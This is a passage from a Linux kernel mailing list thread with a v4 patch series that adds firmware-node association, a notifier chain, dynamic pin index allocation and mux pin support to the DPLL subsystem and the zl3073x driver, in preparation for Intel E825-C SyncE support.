(pin->fwnode == fwnode) { + ret = pin; + refcount_inc(&ret->refcount); + break; + } + } + mutex_unlock(&dpll_lock); + + return ret; +} +EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find); + static int __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv, void *cookie) diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index 8ce969bbeb64e..d3e17ff0ecef0 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -42,6 +42,7 @@ struct dpll_device { * @pin_idx: index of a pin given by dev driver * @clock_id: clock_id of creator * @module: module of creator + * @fwnode: optional reference to firmware node * @dpll_refs: hold referencees to dplls pin was registered with * @parent_refs: hold references to parent pins pin was registered with * @ref_sync_pins: hold references to pins for Reference SYNC feature @@ -54,6 +55,7 @@ struct dpll_pin { u32 pin_idx; u64 clock_id; struct module *module; + struct fwnode_handle *fwnode; struct xarray dpll_refs; struct xarray parent_refs; struct xarray ref_sync_pins; diff --git a/include/linux/dpll.h b/include/linux/dpll.h index c6d0248fa5273..f2e8660e90cdf 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -16,6 +16,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; +struct fwnode_handle; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev); size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); + +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -193,6 +196,12 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) { return 0; } + +static inline struct dpll_pin * +fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + return NULL; +} #endif struct dpll_device * @@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); + int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Associate the registered DPLL pin with its firmware node by calling dpll_pin_fwnode_set(). This links the created pin object to its corresponding DT/ACPI node in the DPLL core. Consequently, this enables consumer drivers (such as network drivers) to locate and request this specific pin using the fwnode_dpll_pin_find() helper. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 7d8ed948b9706..9eed21088adac 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; } + dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode); if (zl3073x_dpll_is_input_pin(pin)) ops = &zl3073x_dpll_input_pin_ops; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Petr Oros <poros@redhat.com> Currently, the DPLL subsystem reports events (creation, deletion, changes) to userspace via Netlink. However, there is no mechanism for other kernel components to be notified of these events directly. Add a raw notifier chain to the DPLL core protected by dpll_lock. This allows other kernel subsystems or drivers to register callbacks and receive notifications when DPLL devices or pins are created, deleted, or modified. Define the following: - Registration helpers: {,un}register_dpll_notifier() - Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc. - Context structures: dpll_{device,pin}_notifier_info to pass relevant data to the listeners. The notification chain is invoked alongside the existing Netlink event generation to ensure in-kernel listeners are kept in sync with the subsystem state. Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> --- drivers/dpll/dpll_core.c | 57 +++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 4 +++ drivers/dpll/dpll_netlink.c | 6 ++++ include/linux/dpll.h | 29 +++++++++++++++++++ 4 files changed, 96 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f04ed7195cadd..b05fe2ba46d91 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -23,6 +23,8 @@ DEFINE_MUTEX(dpll_lock); DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); +static RAW_NOTIFIER_HEAD(dpll_notifier_chain); + static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -46,6 +48,39 @@ struct dpll_pin_registration { void *cookie; }; +static int call_dpll_notifiers(unsigned long action, void *info) +{ + lockdep_assert_held(&dpll_lock); + return raw_notifier_call_chain(&dpll_notifier_chain, action, info); +} + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action) +{ + struct dpll_device_notifier_info info = { + .dpll = dpll, + .id = dpll->id, + .idx = dpll->device_idx, + .clock_id = dpll->clock_id, + .type = dpll->type, + }; + + call_dpll_notifiers(action, &info); +} + +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) +{ + struct dpll_pin_notifier_info info = { + .pin = pin, + .id = pin->id, + .idx = pin->pin_idx, + .clock_id = pin->clock_id, + .fwnode = pin->fwnode, + .prop = &pin->prop, + }; + + call_dpll_notifiers(action, &info); +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev) } EXPORT_SYMBOL(dpll_netdev_pin_clear); +int register_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_register(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(register_dpll_notifier); + +int unregister_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(unregister_dpll_notifier); + /** * dpll_pin_get - find existing or create new dpll pin * @clock_id: clock_id of creator diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index d3e17ff0ecef0..b7b4bb251f739 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -91,4 +91,8 @@ struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs); extern struct xarray dpll_device_xa; extern struct xarray dpll_pin_xa; extern struct mutex dpll_lock; + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action); +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action); + #endif diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c index 904199ddd1781..83cbd64abf5a4 100644 --- a/drivers/dpll/dpll_netlink.c +++ b/drivers/dpll/dpll_netlink.c @@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll) int dpll_device_create_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CREATED); return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll); } int dpll_device_delete_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_DELETED); return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll); } static int __dpll_device_change_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CHANGED); return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll); } @@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin) int dpll_pin_create_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CREATED); return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin); } int dpll_pin_delete_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_DELETED); return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin); } int __dpll_pin_change_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CHANGED); return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin); } diff --git a/include/linux/dpll.h b/include/linux/dpll.h index f2e8660e90cdf..8ed90dfc65f05 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -11,6 +11,7 @@ #include <linux/device.h> #include <linux/netlink.h> #include <linux/netdevice.h> +#include <linux/notifier.h> #include <linux/rtnetlink.h> struct dpll_device; @@ -172,6 +173,30 @@ struct dpll_pin_properties { u32 phase_gran; }; +#define DPLL_DEVICE_CREATED 1 +#define DPLL_DEVICE_DELETED 2 +#define DPLL_DEVICE_CHANGED 3 +#define DPLL_PIN_CREATED 4 +#define DPLL_PIN_DELETED 5 +#define DPLL_PIN_CHANGED 6 + +struct dpll_device_notifier_info { + struct dpll_device *dpll; + u32 id; + u32 idx; + u64 clock_id; + enum dpll_type type; +}; + +struct dpll_pin_notifier_info { + struct dpll_pin *pin; + u32 id; + u32 idx; + u64 clock_id; + const struct fwnode_handle *fwnode; + const struct dpll_pin_properties *prop; +}; + #if IS_ENABLED(CONFIG_DPLL) void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin); void dpll_netdev_pin_clear(struct net_device *dev); @@ -242,4 +267,8 @@ int dpll_device_change_ntf(struct dpll_device *dpll); int dpll_pin_change_ntf(struct dpll_pin *pin); +int register_dpll_notifier(struct notifier_block *nb); + +int unregister_dpll_notifier(struct notifier_block *nb); + #endif -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Allow drivers to register DPLL pins without manually specifying a pin index. Currently, drivers must provide a unique pin index when calling dpll_pin_get(). This works well for hardware-mapped pins but creates friction for drivers handling virtual pins or those without a strict hardware indexing scheme. Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this value as the pin index: 1. The core allocates a unique index using an IDA 2. The allocated index is mapped to a range starting above `INT_MAX` This separation ensures that dynamically allocated indices never collide with standard driver-provided hardware indices, which are assumed to be within the `0` to `INT_MAX` range. The index is automatically freed when the pin is released in dpll_pin_put(). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v2: * fixed integer overflow in dpll_pin_idx_free() --- drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++-- include/linux/dpll.h | 2 ++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index b05fe2ba46d91..59081cf2c73ae 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/idr.h> #include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -24,6 +25,7 @@ DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); static RAW_NOTIFIER_HEAD(dpll_notifier_chain); +static DEFINE_IDA(dpll_pin_idx_ida); static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll, } EXPORT_SYMBOL_GPL(dpll_device_unregister); +static int dpll_pin_idx_alloc(u32 *pin_idx) +{ + int ret; + + if (!pin_idx) + return -EINVAL; + + /* Alloc unique number from IDA. Number belongs to <0, INT_MAX> range */ + ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL); + if (ret < 0) + return ret; + + /* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */ + *pin_idx = (u32)ret + INT_MAX + 1; + + return 0; +} + +static void dpll_pin_idx_free(u32 pin_idx) +{ + if (pin_idx <= INT_MAX) + return; /* Not a dynamic pin index */ + + /* Map the index value from dynamic pin index range to IDA range and + * free it. + */ + pin_idx -= (u32)INT_MAX + 1; + ida_free(&dpll_pin_idx_ida, pin_idx); +} + static void dpll_pin_prop_free(struct dpll_pin_properties *prop) { kfree(prop->package_label); @@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, struct dpll_pin *pin; int ret; + if (pin_idx == DPLL_PIN_IDX_UNSPEC) { + ret = dpll_pin_idx_alloc(&pin_idx); + if (ret) + return ERR_PTR(ret); + } else if (pin_idx > INT_MAX) { + return ERR_PTR(-EINVAL); + } pin = kzalloc(sizeof(*pin), GFP_KERNEL); - if (!pin) - return ERR_PTR(-ENOMEM); + if (!pin) { + ret = -ENOMEM; + goto err_pin_alloc; + } pin->pin_idx = pin_idx; pin->clock_id = clock_id; pin->module = module; @@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, dpll_pin_prop_free(&pin->prop); err_pin_prop: kfree(pin); +err_pin_alloc: + dpll_pin_idx_free(pin_idx); return ERR_PTR(ret); } @@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8ed90dfc65f05..8fff048131f1d 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, void dpll_device_unregister(struct dpll_device *dpll, const struct dpll_device_ops *ops, void *priv); +#define DPLL_PIN_IDX_UNSPEC U32_MAX + struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, const struct dpll_pin_properties *prop); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add parsing for the "mux" string in the 'connection-type' pin property mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
